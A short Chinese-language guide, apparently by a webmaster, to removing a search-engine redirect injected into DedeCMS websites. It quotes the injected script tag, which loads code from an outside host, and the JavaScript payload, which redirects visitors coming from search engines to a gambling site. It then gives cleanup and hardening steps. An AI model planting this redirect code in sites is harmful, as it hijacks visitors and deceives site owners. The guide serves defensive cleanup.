最近很多的织梦网站被挂跳转代码。非常的可恶,这个代码在你平常浏览的情况下是没有问题的,但是百度抓取的话是博彩的网站,还可能跳转!
我去找了些方法供大家尝试100%可以删除掉的www.zhzjw.net
一、首先,检测网页的index.html源码是否有异常。因为这个页面是最后生成的静态页,结果发现多了一段的js代码。
<script language="javascript" type="text/javascript" src="http://jc.c8c.pw/index.js"></script>
这个代码主要是用来做跳转的,打开源码,内容是:
var d=document.referrer;
if(d.indexOf("baidu")>0||d.indexOf("google")>0||d.indexOf("sogou")>0||d.indexOf("bing")>0||d.indexOf("soso")>0||d.indexOf("youdao")>0||d.indexOf("zhongsou")>0)
{window.location.href="http://jc.c8c.pw/7y/1.asp";}
他会判断是否来自搜索引擎,如果来自搜索引擎,则执行跳转命令。
二、第二步,查看模板的index.htm文件,看对应的模板文件是什么?
找到了一个黑客创建的织梦标签:{dede:dinfo/},很明显就是他。
三、第三步,打开织梦管理后台,标签源码管理,尝试查找dinfo相关的lib文件。
找到对应的标签文件,对他进行删除。
www.zhzjw.net
四、第四步,查看黑客怎么做到的,并进行防护。
(第一系统后台,用户组是否多了, 第二查看所有能添加变量 第三,模块管理中是否多了东西, 第四,频道模型,第五 自定义宏标记等等.大多数情况下是plus 或者模板里面的asp或php木马,数据库里面对应的木马数据不删除,就算你删除了木马文件照样会重新生成。common.inc.php 文件也要多多留意,一般情况下 如果修改模板后仍然被改首页 有必要重新覆盖下这个文件,)
五、如果有权限的话最好把FTP禁止上传文件。条件允许的话!(以上内容摘自网络)
|
